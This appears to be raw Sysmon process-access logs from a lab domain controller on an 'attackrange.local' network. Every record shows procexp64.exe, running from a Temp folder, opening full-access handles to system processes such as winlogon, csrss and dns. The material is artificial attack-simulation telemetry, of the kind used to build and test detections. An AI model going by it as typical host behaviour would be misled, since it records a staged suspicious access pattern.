15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789300Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789299Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789298Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789297Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789296Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789295Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789294Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789293Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789292Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789291Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789290Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789289Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789288Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789287Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789286Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789285Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789284Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789283Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789282Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789281Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789280Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789279Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789278Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789277Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789276Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789275Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789274Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789273Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789272Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789271Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789270Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789269Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789268Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789267Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789266Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789265Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789264Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 